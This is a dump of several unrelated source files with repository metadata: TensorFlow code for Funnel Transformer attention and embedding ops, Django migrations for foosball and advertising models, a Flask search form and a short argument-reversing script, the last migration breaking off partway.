"MIT"
] |
permissive
|
yyht/Funnel_Transformer
|
6c17ad12bb6ab5dcbd3f6161b830237dc61add26
|
4b35a794d5e122a8054471863a52d4eac1c39dcd
|
refs/heads/master
| 2022-12-08T08:47:59.692029
| 2020-08-24T07:35:04
| 2020-08-24T07:35:04
| 279,195,871
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,331
|
py
|
"""Common operations used to construct model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
import tensorflow as tf
import functools
# from utils.bert import bert_utils
# from utils.bert import dropout_utils
# stable_dropout = dropout_utils.ReuseDropout()
# from absl import flags
# import absl.logging as _logging
# FLAGS = flags.FLAGS
INF = 1e6
EPS = 1e-9
def check_tf_version():
  """Return True if einsum `...` broadcasting is available (TF 2.x or >= 1.15)."""
version = tf.__version__
print("==tf version==", version)
if int(version.split(".")[0]) >= 2 or int(version.split(".")[1]) >= 15:
return True
else:
return False
###############################################################################
##### Utils
###############################################################################
def safe_precision(func):
"""Safe precision decorator."""
@functools.wraps(func)
def wrapped_func(inputs, *args, **kwargs):
"""Turn inputs into float32 for computation."""
if inputs.dtype != tf.float32:
fp32_inputs = tf.cast(inputs, tf.float32)
else:
fp32_inputs = inputs
output = func(fp32_inputs, *args, **kwargs)
if output.dtype != inputs.dtype:
output = tf.cast(output, inputs.dtype)
return output
return wrapped_func
def get_einsum_prefix(ndims, einsum_symbols=None):
if einsum_symbols is None:
einsum_symbols = ["u", "v", "w", "x", "y", "z"]
assert ndims <= len(einsum_symbols)
einsum_prefix = ""
for i in range(ndims):
einsum_prefix += einsum_symbols[i]
return einsum_prefix
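# For example, get_einsum_prefix(3) == "uvw", and with custom symbols
# get_einsum_prefix(2, ["a", "b"]) == "ab".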
def update_ret_dict(tgt, src, prefix=None):
if prefix is None:
tgt.update(src)
else:
for k, v in src.items():
tgt["{}/{}".format(prefix, k)] = v
return tgt
###############################################################################
##### Common ops
###############################################################################
safe_softmax = safe_precision(tf.nn.softmax)
def embedding_lookup(x, n_embed, d_embed, initializer, lookup_table=None,
use_tpu=True, scope="embedding", reuse=None,
dtype=tf.float32, embedding_table_adv=None):
"""tpu and gpu embedding_lookup function."""
with tf.variable_scope(scope, reuse=reuse):
if lookup_table is None:
lookup_table = tf.get_variable("lookup_table", shape=[n_embed, d_embed],
dtype=dtype, initializer=initializer)
if embedding_table_adv is not None:
embedding_table_adv += lookup_table
tf.logging.info("==apply adv embedding==")
else:
embedding_table_adv = lookup_table
tf.logging.info("==apply normal embedding==")
if len(x.shape.as_list()) == 2:
one_hot_idx = tf.one_hot(x, n_embed, dtype=dtype)
tf.logging.info("==apply onehot embedding==")
elif len(x.shape.as_list()) == 3:
one_hot_idx = x
tf.logging.info("==apply gumbel embedding==")
else:
one_hot_idx = tf.one_hot(x, n_embed, dtype=dtype)
tf.logging.info("==apply onehot embedding==")
if len(x.shape.as_list()) == 2:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix)
elif len(x.shape.as_list()) == 3:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix[:-1])
else:
einsum_prefix = get_einsum_prefix(x.shape.ndims)
einsum_str = "{0}n,nd->{0}d".format(einsum_prefix)
tf.logging.info("*** einsum_str: %s ***", einsum_str)
output = tf.einsum(einsum_str, one_hot_idx, embedding_table_adv)
print(one_hot_idx.get_shape(), embedding_table_adv.get_shape(),
"==embedding shape==", einsum_str, output.get_shape())
return output, lookup_table
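# Illustrative usage (hypothetical shapes): int ids of shape [B, T] are
# one-hot encoded to [B, T, n_embed] and contracted with the [n_embed, d_embed]
# lookup table via einsum ("uvn,nd->uvd"), avoiding tf.gather, which is the
# TPU-friendly formulation; the returned output has shape [B, T, d_embed].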
def dense(x, out_shape, initializer, inp_shape=None, begin_axis=-1,
use_bias=True, activation=None, scope="dense", reuse=False):
"""A more flexible dense layer."""
if isinstance(out_shape, int):
out_shape = [out_shape]
if inp_shape is None:
inp_shape = x.shape.as_list()[begin_axis:]
elif isinstance(inp_shape, int):
inp_shape = [inp_shape]
inp_syms = ["a", "b", "c", "d"]
out_syms = ["e", "f", "g", "h"]
prefix = get_einsum_prefix(x.shape.ndims - len(inp_shape))
inp_str = get_einsum_prefix(len(inp_shape), inp_syms)
out_str = get_einsum_prefix(len(out_shape), out_syms)
with tf.variable_scope(scope, reuse=reuse):
kernel_shape = inp_shape + out_shape
kernel = tf.get_variable("kernel",
kernel_shape,
dtype=x.dtype,
initializer=initializer)
output = tf.einsum(
"{0}{1},{1}{2}->{0}{2}".format(prefix, inp_str, out_str), x, kernel)
print(x.get_shape(), kernel.get_shape(), "==dense shape==", prefix,
inp_str, out_str, output.get_shape())
if use_bias:
bias = tf.get_variable("bias",
out_shape,
dtype=x.dtype,
initializer=tf.zeros_initializer())
output += bias
if activation is not None:
output = activation(output)
return output
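# Illustrative usage (hypothetical shapes): projecting [B, T, d_model] hidden
# states to per-head queries with out_shape=[n_head, d_head] builds a kernel
# of shape [d_model, n_head, d_head] and computes
# tf.einsum("uva,aef->uvef", x, kernel), yielding [B, T, n_head, d_head].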
@safe_precision
def layer_norm_op(inputs,
norm_shape=None,
begin_norm_axis=-1,
center=True,
scale=True,
activation_fn=None,
reuse=None,
trainable=True,
name=None):
"""Custom Layer Normalization layer."""
if norm_shape is None:
# If `norm_shape` is not provided, use `begin_norm_axis` to infer
norm_shape = inputs.shape[begin_norm_axis:]
elif isinstance(norm_shape, int):
# If `norm_shape` is provided as int, convert it to list
norm_shape = [norm_shape]
with tf.variable_scope(name, "layer_norm", [inputs], reuse=reuse):
inputs_rank = inputs.shape.ndims
if inputs_rank is None:
raise ValueError("Inputs %s has undefined rank." % inputs.name)
dtype = inputs.dtype.base_dtype
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta = tf.get_variable(
"beta",
shape=norm_shape,
dtype=dtype,
initializer=tf.zeros_initializer(),
trainable=trainable)
if scale:
gamma = tf.get_variable(
"gamma",
shape=norm_shape,
dtype=dtype,
initializer=tf.ones_initializer(),
trainable=trainable)
# By default, compute the moments across all the dimensions except the one
# with index 0.
norm_axes = list(range(inputs_rank - len(norm_shape), inputs_rank))
mean, variance = tf.nn.moments(inputs, norm_axes, keep_dims=True)
# Compute layer normalization using the batch_normalization function.
# Note that epsilon must be increased for float16 due to the limited
# representable range.
variance_epsilon = 1e-8 if dtype != tf.float16 else 1e-3
outputs = tf.nn.batch_normalization(
inputs,
mean,
variance,
offset=beta,
scale=gamma,
variance_epsilon=variance_epsilon)
outputs.set_shape(inputs.shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return outputs
# def dropout_op(tensor, rate, training, *args, **kwargs):
# kwargs["dtype"] = tensor.dtype
# dropout_func = tf.keras.layers.Dropout(rate, *args, **kwargs)
# return dropout_func(tensor, training=training)
def dropout_op(tensor, rate, training, *args, **kwargs):
dropout_name = kwargs.get('name', "")
# if dropout_name:
# output = stable_dropout.dropout(tensor, rate, dropout_name)
# else:
tf.logging.info("****** dropout name: %s, rate: %s"%(dropout_name, str(rate)))
if rate is None or rate == 0.0:
return tensor
if training:
tf.logging.info("****** dropout *******")
return tf.nn.dropout(tensor, keep_prob=1.0 - rate)
else:
tf.logging.info("****** original *******")
return tensor
def gelu(x):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
`x` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + tf.tanh(
(np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))
return x * cdf
def get_activation(activation_type):
"""Get the corresponding activation function from string."""
if activation_type == "relu":
activation = tf.nn.relu
elif activation_type == "gelu":
activation = gelu
elif activation_type == "tanh":
activation = tf.tanh
else:
raise ValueError("Unsupported activation type {}".format(activation_type))
return activation
###############################################################################
##### Transformer ops
###############################################################################
def residual_and_layer_norm(residual, hidden, norm_shape=None):
"""Perform residual & layer normalization."""
ret_dict = {}
if residual is not None:
output = hidden + residual
else:
output = hidden
output = layer_norm_op(output, norm_shape=norm_shape, name="layer_norm")
return output, ret_dict
def positionwise_ffn(inp, d_model, d_inner, dropout, dropact, initializer,
activation_type="gelu", scope="ff", is_training=True,
reuse=None, name="ffn"):
"""Position-wise Feed-forward Network."""
ret_dict = {}
activation = get_activation(activation_type)
output = inp
with tf.variable_scope(scope, reuse=reuse):
# mlp part
output = dense(output, d_inner, inp_shape=d_model, activation=activation,
initializer=initializer, scope="layer_1")
output = dropout_op(output, dropact, training=is_training, name=name+"/ffn_drop_1")
output = dense(output, d_model, initializer=initializer, inp_shape=d_inner,
scope="layer_2")
    output = dropout_op(output, dropout, training=is_training, name=name+"/ffn_drop_2")
# post ffn process
output, res_lnorm_dict = residual_and_layer_norm(inp, output,
norm_shape=d_model)
# add to monitor dict
ret_dict = update_ret_dict(ret_dict, res_lnorm_dict)
return output, ret_dict
def rel_attn_core(
d_model, n_head, d_head, q, k, v, pos_enc, seg_mat, attn_mask, attn_bias,
dropatt, is_training, initializer, func_mask=None,
rel_attn_type="factorized", name="rel_attn"):
"""Core relative positional attention operations."""
ret_dict = {}
tf_float = q.dtype
q_head = dense(q, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="q", use_bias=False)
k_head = dense(k, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="k")
v_head = dense(v, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="v")
# scale `q_head`
scale = tf.cast(1.0 / np.sqrt(d_head), tf_float)
q_head = q_head * scale
# content based attention score
r_w_bias = tf.get_variable("r_w_bias", [n_head, d_head],
dtype=tf_float, initializer=initializer)
if not check_tf_version():
# print((q_head + r_w_bias * scale).get_shape(), k_head.get_shape())
content_bias = tf.einsum("aind,ajnd->anij",
q_head + r_w_bias * scale, k_head)
else:
content_bias = tf.einsum("...ind,...jnd->...nij",
q_head + r_w_bias * scale, k_head)
print(q_head.get_shape(), (r_w_bias * scale).get_shape(), k_head.get_shape(),
"==rel_attn_core shape==", content_bias.get_shape())
# position based attention score
if pos_enc is None:
pos_bias = 0
else:
##### Utilize the decomposed version when using TPU #####
if rel_attn_type == "factorized":
# if FLAGS.verbose:
tf.logging.info("Compute rel-pos attn with factorized implementation.")
pos_bias = rel_pos_bias(q_head, pos_enc, d_model, n_head, d_head,
initializer, func_mask=func_mask, dtype=tf_float)
elif rel_attn_type == "rel_shift":
# if FLAGS.verbose:
tf.logging.info("Compute rel-pos attn with rel-shift implementation.")
klen = tf.shape(content_bias)[-1]
pos_bias = rel_pos_bias_gpu(q_head, pos_enc, d_model, n_head, d_head,
klen, initializer, func_mask=func_mask,
dtype=tf_float)
else:
raise NotImplementedError
# segment based attention score
if seg_mat is None:
seg_bias = 0
else:
# if FLAGS.verbose:
tf.logging.info("Compute rel-seg attn.")
seg_bias = rel_seg_bias(q_head, seg_mat, n_head, d_head, initializer,
func_mask=func_mask, dtype=tf_float)
# merge attention scores
attn_score = content_bias + pos_bias + seg_bias
# add extra attention score if provided
if attn_bias is not None:
# if FLAGS.verbose:
tf.logging.info("Attention bias shape: %s", attn_bias.shape)
attn_score += attn_bias * scale
# perform masking
if attn_mask is not None:
# if FLAGS.verbose:
tf.logging.info("Attention mask shape: %s", attn_mask.shape)
ret_dict["attn_mask"] = attn_mask
attn_score = attn_score - INF * tf.cast(attn_mask, attn_score.dtype)
# attention probability
attn_prob = safe_softmax(attn_score, -1)
ret_dict["attn_prob"] = attn_prob
attn_prob = dropout_op(attn_prob, dropatt, training=is_training, name=name+"/rel_attn_core")
# attention output
# print(attn_prob.get_shape(), v_head.get_shape())
if not check_tf_version():
attn_vec = tf.einsum("anij,ajnd->aind", attn_prob, v_head)
else:
attn_vec = tf.einsum("...nij,...jnd->...ind", attn_prob, v_head)
print(attn_prob.get_shape(), (v_head).get_shape(),
"==attn_core shape==", attn_vec.get_shape())
# things to monitor in attention
ret_dict["content_bias"] = content_bias
if pos_enc is not None:
ret_dict["pos_bias"] = pos_bias
if seg_mat is not None:
ret_dict["seg_bias"] = seg_bias
return attn_vec, ret_dict
def rel_multihead_attn(q, k, v, pos_enc, seg_mat, attn_mask, d_model, n_head,
d_head, dropout, dropatt, is_training, initializer,
attn_bias=None, func_mask=None, scope="rel_attn",
reuse=None, rel_attn_type="factorized",
name='rel_attn'):
"""Multi-head attention with relative positional encoding."""
ret_dict = {}
with tf.variable_scope(scope, reuse=reuse) as scope:
# attention core
attn_vec, attn_core_dict = rel_attn_core(
d_model, n_head, d_head, q, k, v, pos_enc, seg_mat, attn_mask,
attn_bias, dropatt, is_training, initializer, func_mask=func_mask,
rel_attn_type=rel_attn_type)
# post projection
attn_out = dense(attn_vec, d_model, initializer=initializer,
inp_shape=[n_head, d_head], scope="o")
attn_out = dropout_op(attn_out, dropout, training=is_training, name=name+"/rel_multihead_attn")
# residual + layer normalization
output, post_dict = residual_and_layer_norm(q, attn_out,
norm_shape=d_model)
# things to monitor
ret_dict = update_ret_dict(ret_dict, attn_core_dict)
ret_dict = update_ret_dict(ret_dict, post_dict)
return output, ret_dict
###############################################################################
##### relative positional attention ops
###############################################################################
def rel_shift(x, row_dim, klen=-1, shift=1):
"""Perform relative shift to form the relative attention score."""
ndims = x.shape.ndims
x_shape = tf.shape(x)
# Deal with negative indexing
if row_dim < 0:
row_dim = ndims + row_dim
assert row_dim >= 0
# Assume `col_dim` = `row_dim + 1`
col_dim = row_dim + 1
assert col_dim < ndims
tgt_shape_1, slice_begin_1, slice_len_1 = [], [], []
tgt_shape_2, slice_begin_2, slice_len_2 = [], [], []
for i in range(ndims):
slice_len_1.append(-1)
slice_begin_2.append(0)
if i == row_dim:
tgt_shape_1.append(x_shape[col_dim])
tgt_shape_2.append(x_shape[row_dim])
slice_begin_1.append(shift)
slice_len_2.append(-1)
elif i == col_dim:
tgt_shape_1.append(x_shape[row_dim])
tgt_shape_2.append(x_shape[col_dim] - shift)
slice_begin_1.append(0)
slice_len_2.append(klen)
else:
tgt_shape_1.append(x_shape[i])
tgt_shape_2.append(x_shape[i])
slice_begin_1.append(0)
slice_len_2.append(-1)
x = tf.reshape(x, tgt_shape_1)
x = tf.slice(x, slice_begin_1, slice_len_1)
x = tf.reshape(x, tgt_shape_2)
x = tf.slice(x, slice_begin_2, slice_len_2)
return x
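# Sketch of the shift trick (shapes are illustrative): for a tensor whose
# trailing dims are [qlen, klen], the reshape -> slice -> reshape -> slice
# sequence above realigns column j of row i to relative distance i - j,
# emulating a gather over relative positions using only cheap reshapes.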
def rel_pos_bias_gpu(q_head, pos_enc, d_model, n_head, d_head, klen,
initializer, func_mask=None, dtype=tf.float32):
"""Relative attention positional bias via relative shift for GPU."""
enc, shift = pos_enc
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
# parameters
r_r_bias = tf.get_variable("r_r_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
r_head = dense(enc, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="r", use_bias=False)
# [B x T x N x D]
if not check_tf_version():
pos_bias = tf.einsum("ainh,jnh->anij", q_head + r_r_bias * scale,
r_head)
else:
pos_bias = tf.einsum("...inh,jnh->...nij", q_head + r_r_bias * scale,
r_head)
print((q_head + r_r_bias * scale).get_shape(),
(r_head).get_shape(), "==rel_pos_bias_gpu shape==", pos_bias.get_shape())
pos_bias = rel_shift(pos_bias, -2, klen, shift)
if func_mask is not None:
pos_bias *= func_mask
return pos_bias
def rel_pos_bias(q_head, pos_enc, d_model, n_head, d_head, initializer,
func_mask=None, dtype=tf.float32):
"""Relative attention positional bias."""
# [(B) x T x D]
enc_q_1, enc_q_2, enc_k_1, enc_k_2 = pos_enc
# parameters
r_r_bias = tf.get_variable("r_r_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
r_kernel = tf.get_variable("r/kernel", [d_model, n_head, d_head],
dtype=dtype, initializer=initializer)
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
# [B x T x N x D]
# print((q_head + r_r_bias * scale).get_shape(), r_kernel.get_shape())
if not check_tf_version():
q_head_r = tf.einsum("ainh,dnh->aind", q_head + r_r_bias * scale,
r_kernel)
else:
q_head_r = tf.einsum("...inh,dnh->...ind", q_head + r_r_bias * scale,
r_kernel)
print((q_head + r_r_bias * scale).get_shape(),
(r_kernel).get_shape(), "==rel_pos_bias shape==", q_head_r.get_shape())
# [(B) x T x N x D]
q_head_r_1 = q_head_r * tf.expand_dims(enc_q_1, -2)
q_head_r_2 = q_head_r * tf.expand_dims(enc_q_2, -2)
# tf.logging.info("%s, %s, %s", q_head_r, q_head_r_1, q_head_r_2)
# [(B) x T x N x D]
prefix_k = get_einsum_prefix(enc_k_1.shape.ndims - 2)
if not check_tf_version():
einsum_str = "aind,{0}jd->anij".format(prefix_k)
else:
einsum_str = "...ind,{0}jd->...nij".format(prefix_k)
pos_bias = (tf.einsum(einsum_str, q_head_r_1, enc_k_1) +
tf.einsum(einsum_str, q_head_r_2, enc_k_2))
print((q_head_r_1).get_shape(),
(enc_k_1).get_shape(), "==rel_pos_bias shape==",
prefix_k, einsum_str, pos_bias.get_shape())
if func_mask is not None:
pos_bias *= func_mask
return pos_bias
def rel_seg_bias(q_head, seg_mat, n_head, d_head, initializer, func_mask=None,
dtype=tf.float32):
"""Relative attention segmentation bias."""
# Expand seg_mat: [... x N x T x T]
tgt_shape = []
for i in range(seg_mat.shape.ndims):
tgt_shape.append(tf.shape(seg_mat)[i])
tgt_shape.insert(-2, n_head)
seg_mat = tf.expand_dims(seg_mat, -3)
# Compute same / diff biases
r_s_bias = tf.get_variable("r_s_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
seg_embed = tf.get_variable("seg_embed", [2, n_head, d_head],
dtype=dtype, initializer=initializer)
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
q_head_s = q_head + r_s_bias * scale
# [... x N x T x 2]
if not check_tf_version():
seg_biases = tf.einsum("ainh,snh->anis", q_head_s, seg_embed)
else:
seg_biases = tf.einsum("...inh,snh->...nis", q_head_s, seg_embed)
print((q_head_s).get_shape(),
(seg_embed).get_shape(), "==rel_seg_bias shape==",
seg_biases.get_shape())
# Split into `diff` & `same`: [... x N x T x 1]
seg_bias_diff, seg_bias_same = tf.split(seg_biases, 2, axis=-1)
# Broadcast
seg_mat = tf.broadcast_to(seg_mat, tgt_shape)
seg_bias_diff = tf.broadcast_to(seg_bias_diff, tgt_shape)
seg_bias_same = tf.broadcast_to(seg_bias_same, tgt_shape)
seg_bias = tf.where(seg_mat, seg_bias_same, seg_bias_diff)
if func_mask is not None:
seg_bias *= func_mask
return seg_bias
def seg_id_to_mat(seg_q, seg_k, config):
"""Convert `seg_id` to `seg_mat`."""
if seg_q is None or seg_k is None:
return None
seg_mat = tf.equal(tf.expand_dims(seg_q, -1), tf.expand_dims(seg_k, -2))
# Treat [cls] as in the same segment as both A & B
cls_mat = tf.logical_or(
tf.expand_dims(tf.equal(seg_q, tf.constant([config.seg_id_cls], dtype=seg_q.dtype)), -1),
tf.expand_dims(tf.equal(seg_k, tf.constant([config.seg_id_cls], dtype=seg_k.dtype)), -2))
seg_mat = tf.logical_or(cls_mat, seg_mat)
return seg_mat
def get_pos_enc(pos_id_q, pos_id_k, d_model, dropout, is_training,
clamp_len=-1, dtype=tf.float32, name='pos_enc'):
"""Create inputs related to relative position encoding."""
pos_id_q = tf.cast(pos_id_q, dtype)
pos_id_k = tf.cast(pos_id_k, dtype)
  if clamp_len > 0:
    pos_id_q = tf.clip_by_value(pos_id_q, -clamp_len, clamp_len)
    pos_id_k = tf.clip_by_value(pos_id_k, -clamp_len, clamp_len)
d_model_half = d_model // 2
freq_seq = tf.cast(tf.range(0, d_model_half, 1.0), dtype=dtype)
inv_freq = 1 / (10000 ** (freq_seq / d_model_half))
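  # Transformer-style sinusoid frequencies:
  # inv_freq[j] = 10000**(-j / (d_model / 2)) for j in [0, d_model / 2).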
# print(pos_id_q.get_shape(), inv_freq.get_shape())
# sinusoid_q = tf.einsum("...i,d->...id", pos_id_q, inv_freq)
# sinusoid_k = tf.einsum("...i,d->...id", pos_id_k, inv_freq)
if not check_tf_version():
sinusoid_q = tf.einsum("i,d->id", pos_id_q, inv_freq)
sinusoid_k = tf.einsum("i,d->id", pos_id_k, inv_freq)
else:
sinusoid_q = tf.einsum("...i,d->...id", pos_id_q, inv_freq)
sinusoid_k = tf.einsum("...i,d->...id", pos_id_k, inv_freq)
print((pos_id_q).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid_q.get_shape())
print((pos_id_k).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid_k.get_shape())
sin_enc_q = tf.sin(sinusoid_q)
cos_enc_q = tf.cos(sinusoid_q)
sin_enc_q = dropout_op(sin_enc_q, dropout, training=is_training, name=name+"/pos_enc_sin")
cos_enc_q = dropout_op(cos_enc_q, dropout, training=is_training, name=name+"/pos_enc_cos")
sin_enc_k = tf.sin(sinusoid_k)
cos_enc_k = tf.cos(sinusoid_k)
enc_q_1 = tf.concat([sin_enc_q, sin_enc_q], axis=-1)
enc_k_1 = tf.concat([cos_enc_k, sin_enc_k], axis=-1)
enc_q_2 = tf.concat([cos_enc_q, cos_enc_q], axis=-1)
enc_k_2 = tf.concat([-sin_enc_k, cos_enc_k], axis=-1)
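  # Why the factorization works: per frequency, with q = pos_id_q and
  # k = pos_id_k,
  #   enc_q_1 . enc_k_1 + enc_q_2 . enc_k_2
  #     = sin(q)cos(k) - cos(q)sin(k) + sin(q)sin(k) + cos(q)cos(k)
  #     = sin(q - k) + cos(q - k),
  # so the resulting positional bias depends only on the relative offset.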
return [enc_q_1, enc_q_2, enc_k_1, enc_k_2]
def get_pos_enc_gpu(rel_pos_id, d_model, dropout, is_training,
clamp_len=-1, dtype=tf.float32, name='pos_enc'):
"""Create inputs related to relative position encoding."""
rel_pos_id = tf.cast(rel_pos_id, dtype)
  if clamp_len > 0:
    rel_pos_id = tf.clip_by_value(rel_pos_id, -clamp_len, clamp_len)
d_model_half = d_model // 2
freq_seq = tf.cast(tf.range(0, d_model_half, 1.0), dtype=dtype)
inv_freq = 1 / (10000 ** (freq_seq / d_model_half))
if not check_tf_version():
sinusoid = tf.einsum("i,d->id", rel_pos_id, inv_freq)
else:
sinusoid = tf.einsum("...i,d->...id", rel_pos_id, inv_freq)
print((rel_pos_id).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid.get_shape())
sin_enc = tf.sin(sinusoid)
cos_enc = tf.cos(sinusoid)
sin_enc = dropout_op(sin_enc, dropout, training=is_training, name=name+"/pos_enc_sin")
cos_enc = dropout_op(cos_enc, dropout, training=is_training, name=name+"/pos_enc_cos")
pos_enc = tf.concat([sin_enc, cos_enc], axis=-1)
return pos_enc
|
[
"albert.xht@alibaba-inc.com"
] |
albert.xht@alibaba-inc.com
|
b22be2c324a03ef1cb8e0e9c9d174b469967778b
|
695af55893dd40f8e2effdd67bfdcfff9093ba69
|
/tfoosball/migrations/0012_member.py
|
4ab00f5415e2970f3cdaf0b73b93433df778845c
|
[] |
no_license
|
TeoTN/TFoosball-API
|
78cb702460017d1f9e6caa902c93bf576b8955cf
|
8ab8951662b1fb6ac126b31ff66f324936a0f2b8
|
refs/heads/master
| 2021-07-17T08:41:51.610291
| 2020-06-05T17:19:57
| 2020-06-05T19:01:19
| 67,066,305
| 0
| 1
| null | 2021-06-10T18:37:04
| 2016-08-31T19:17:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 22:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tfoosball', '0011_team'),
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=14)),
('exp', models.IntegerField(default=1000)),
('offence', models.IntegerField(default=0)),
('defence', models.IntegerField(default=0)),
('played', models.IntegerField(default=0)),
('win_streak', models.IntegerField(default=0)),
('curr_win_streak', models.IntegerField(default=0)),
('lose_streak', models.IntegerField(default=0)),
('curr_lose_streak', models.IntegerField(default=0)),
('lowest_exp', models.IntegerField(default=1000)),
('highest_exp', models.IntegerField(default=1000)),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tfoosball.Team')),
],
),
]
|
[
"staniowp@gmail.com"
] |
staniowp@gmail.com
|
e89b97449c4a586d8b6ceea9a3ece86b666a323b
|
7cf8c1d255b273be9352efa8bc386948991c6180
|
/forms.py
|
d603453da3c75e097a47317d3af5387287b22c89
|
[] |
no_license
|
RoopeKeto/book-recommender
|
90571fd4c8de3c5d6af03dd0009862121985f720
|
05526d128827ad44331e60239dd9c06d088e7c99
|
refs/heads/master
| 2022-07-07T05:39:13.063898
| 2019-07-28T10:21:31
| 2019-07-28T10:21:31
| 198,982,898
| 0
| 0
| null | 2022-06-21T22:24:20
| 2019-07-26T08:56:15
|
Python
|
UTF-8
|
Python
| false
| false
| 416
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, Length
class SearchForm(FlaskForm):
searchword = StringField('Search word',
validators=[DataRequired(), Length(min=1, max=200)],
)
search = SubmitField('Search')
|
[
"roope.keto@outlook.com"
] |
roope.keto@outlook.com
|
62a9d24b01c6842cb24bc2ee68676f65c52134bd
|
8274dc68727b53ec7b10e0b3f32f24427f5746ef
|
/intro-1.py
|
4fb0d414224e96f19d4cc4c278950732f3fdd75e
|
[] |
no_license
|
cristea-raul/py-plp-exercises
|
8108046bd9fefd82fcea726b2f80555796f3b640
|
5e0e1bc4bdf530243ca850ccfeb9dbcc501f4231
|
refs/heads/master
| 2021-01-16T21:17:48.861859
| 2015-05-27T17:28:43
| 2015-11-26T12:21:20
| 36,383,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
import sys
print(''.join([(arg[::-1]) + ' ' for arg in sys.argv[:0:-1]])[:-1])
|
[
"cristea.raul@gmail.com"
] |
cristea.raul@gmail.com
|
7d8a4669826bf427dd2777b62d5a2591bd63c94c
|
9b6f65a28af4c6befdd015d1416d6257138c0219
|
/alpha/advertising/migrations/0001_initial.py
|
ea66fae42001f4fef13a91de1a42f8757f91a575
|
[] |
no_license
|
dany431/cityfusion
|
5beec53131898e539a892249fa711fb3086fb53c
|
4e67464db69cfa21c965e4eb8796a5c727d5a443
|
refs/heads/master
| 2016-08-11T13:20:17.966539
| 2016-01-13T11:17:12
| 2016-01-13T11:17:12
| 49,567,611
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,799
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'AdvertisingType'
db.create_table(u'advertising_advertisingtype', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('width', self.gf('django.db.models.fields.IntegerField')()),
('height', self.gf('django.db.models.fields.IntegerField')()),
('cpm_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpm_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('cpc_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpc_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
))
db.send_create_signal(u'advertising', ['AdvertisingType'])
# Adding model 'AdvertisingCampaign'
db.create_table(u'advertising_advertisingcampaign', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('account', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['accounts.Account'])),
('all_of_canada', self.gf('django.db.models.fields.BooleanField')(default=False)),
('budget_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('budget', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('ammount_spent_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('ammount_spent', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('ammount_remaining_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('ammount_remaining', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('started', self.gf('django.db.models.fields.DateTimeField')()),
('ended', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal(u'advertising', ['AdvertisingCampaign'])
# Adding M2M table for field regions on 'AdvertisingCampaign'
db.create_table(u'advertising_advertisingcampaign_regions', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('advertisingcampaign', models.ForeignKey(orm[u'advertising.advertisingcampaign'], null=False)),
('region', models.ForeignKey(orm[u'cities.region'], null=False))
))
db.create_unique(u'advertising_advertisingcampaign_regions', ['advertisingcampaign_id', 'region_id'])
# Adding model 'Advertising'
db.create_table(u'advertising_advertising', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
